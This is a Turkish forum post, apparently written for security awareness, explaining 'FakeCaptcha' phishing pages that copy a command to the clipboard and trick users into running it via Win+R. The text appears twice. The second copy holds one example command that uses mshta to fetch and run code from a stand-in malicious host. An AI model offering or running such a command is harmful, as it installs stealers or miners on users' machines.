Herkese iyi forumlar.
Bugünkü konumuzda internette sıkça karşılaşılan bir senaryo olan "FakeCaptcha" saldırılarını ele alacağız.
Öncelikle Captcha nedir? Captcha, internet üzerindeki botlara karşı gerçek zamanlı kullanıcıların arasındaki farkı belirlemek için web sitesi sahipleri tarafından kullanılan bir filtreleme sistemidir.
Gelişen internet teknolojileriyle birlikte "oltalama" dediğimiz saldırı türünde yeni yeni teknikler ortaya çıkmaya başlamıştır. Bu saldırılardan bir tanesi ise bu bahsettiğim "FakeCaptcha" saldırısıdır.
Saldırganlar, rastgele domainler kullanarak kendilerine bir captcha sayfası oluşturur ve sayfaya girdiğiniz an bir komut girdisi otomatik olarak panoya kopyalanır ve sizden Win+R kombinasyonu ile birlikte çıkan çalıştır sekmesine bu kodu yapıştırıp çalıştırmanızı ister
kod şunun gibi bir şey olabilir:
Fotoğrafta gösterildiği gibi çalıştırılan kod içerisinde PS1 scripti çalıştırarak bu script içinde zararlıyı sisteme entegre etmeye çalışır.
aşağıdaki fotoğrafta karşınıza çıkabilecek zararlı dosya örneğinin içeriği mevcuttur.
Genellikle fakecaptcha üzerinden gelen dosyalar, kullanıcının bilgilerini veya sistemini kullanarak ya stealer ya da miner görevi görerek verebileceği zararı maksimum düzeye çıkartmayı amaçlar.
Günün sonunda "𝓕𝓪𝓷𝓬𝔂" websitelerine girerken dikkatli olmalı ve bilmediğiniz komutları bilgisayarınızda çalıştırmayın yeterli.
2026'da Güvende Kalmanız Dileğiyle!
Bugünkü konumuzda internette sıkça karşılaşılan bir senaryo olan "FakeCaptcha" saldırılarını ele alacağız.
Öncelikle Captcha nedir? Captcha, internet üzerindeki botlara karşı gerçek zamanlı kullanıcıların arasındaki farkı belirlemek için web sitesi sahipleri tarafından kullanılan bir filtreleme sistemidir.
Gelişen internet teknolojileriyle birlikte "oltalama" dediğimiz saldırı türünde yeni yeni teknikler ortaya çıkmaya başlamıştır. Bu saldırılardan bir tanesi ise bu bahsettiğim "FakeCaptcha" saldırısıdır.
Saldırganlar, rastgele domainler kullanarak kendilerine bir captcha sayfası oluşturur ve sayfaya girdiğiniz an bir komut girdisi otomatik olarak panoya kopyalanır ve sizden Win+R kombinasyonu ile birlikte çıkan çalıştır sekmesine bu kodu yapıştırıp çalıştırmanızı ister
kod şunun gibi bir şey olabilir:
Kod:
mshta http://maliciouswebsite.com/virus.htmlFotoğrafta gösterildiği gibi çalıştırılan kod içerisinde PS1 scripti çalıştırarak bu script içinde zararlıyı sisteme entegre etmeye çalışır.
aşağıdaki fotoğrafta karşınıza çıkabilecek zararlı dosya örneğinin içeriği mevcuttur.
Genellikle fakecaptcha üzerinden gelen dosyalar, kullanıcının bilgilerini veya sistemini kullanarak ya stealer ya da miner görevi görerek verebileceği zararı maksimum düzeye çıkartmayı amaçlar.
Günün sonunda "𝓕𝓪𝓷𝓬𝔂" websitelerine girerken dikkatli olmalı ve bilmediğiniz komutları bilgisayarınızda çalıştırmayın yeterli.
2026'da Güvende Kalmanız Dileğiyle!
Son düzenleme:
